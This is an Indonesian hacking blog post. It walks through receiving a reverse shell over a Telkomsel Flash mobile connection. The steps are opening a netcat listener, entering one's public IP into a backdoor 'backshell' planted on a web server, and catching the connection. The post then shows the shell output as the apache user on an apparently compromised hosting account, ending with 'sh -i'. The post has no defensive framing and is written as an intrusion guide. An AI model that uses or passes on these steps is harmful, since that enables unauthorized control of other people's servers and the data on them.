Beranda » Back|Track » Connect<BACK In TelkomselFlash

Connect<BACK In TelkomselFlash

Start here

malam jumat yg seram nulis artikel yg sangat2 cupu di kamar gu3.
hanya di temanin suara keyboard dan fun processor yg terdengar sangat kencang
dan di hiasi dengan compiz-fucion pada OS slackware gu3..wew asik…………!!!
to the pointmi the..
gu3 nulis artikel dengan judul Connect<BACK In TelkomselFlash
awalnya gu3 kira ip telkomselflash di blokir or private
dan sy bertanya-tanya kok pake telkomselflash jelek buanget ya ssh tunnel nga bisa
ssh jg nga bisa apalagi Backconnect.namun ada tmn gu3 yg nicknya dr.crash mengatakan kepada gue
klo telkomselflash bisa tuh di pake backconnect cmn jangan pake ssh langsung aja IP public PT. Telekomunikasi Selular (Telkomsel)
heheheh … ookay sob gue coba dulu ….

step 1
Membuka port xxxx dgn service netcat/telnet
step 2
cek ip public telkomselflash kita di sini ::.http://whatismyipaddress.com/
step 3
ex:
ip public gue [182.1.49.238]
setelah ip public di cek copas(CopyPaste)ip publicnya pada Backdoor(remote backshell) kita trus sesuaikan portna yg akan di binding/bindtty kemudian pada backshell klik Connect
step 4
tulis perintah di konsole seperti

root@guu3~# nc -vlp (port)
listening on [any] (port)….

nah apabila server A——->B terhubung maka listening on [any] akan lanjut seperti ini

connect to [182.1.49.238] from ns1.gu3internetan.com [64.46.123.xx] 32811
:: vim-n4n0-shell (Private Build v0.3) reverse shell ::

System Info: Linux apabagus.gu3internetan.com 2.6.18-194.17.4.el5 #1 SMP Mon Oct 25 15:51:07 EDT 2009 i686 i386 GNU/Linux
Your ID: uid=48(apache) gid=48(apache) groups=48(apache),2523(psaserv)
Current Directory: /var/www/vhosts/gu3internetan.com/subdomains/store/httpdocs/pub
apache@apabagus.gu3internetan.com:~ >
ls
lho
gu3
enD
error.php
hehehehehe…
sh -i
sh: no job control in this shell
sh-3.2$

setelah terhubung server A——->B terserah kita aje otak-atik perintah konsole mu

g00D Lnck…


2 Komentar

  1. Dr_Cr4sH mengatakan:

    Liat-liat blog ta … sambil baca”

Tinggalkan Balasan

Please log in using one of these methods to post your comment:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s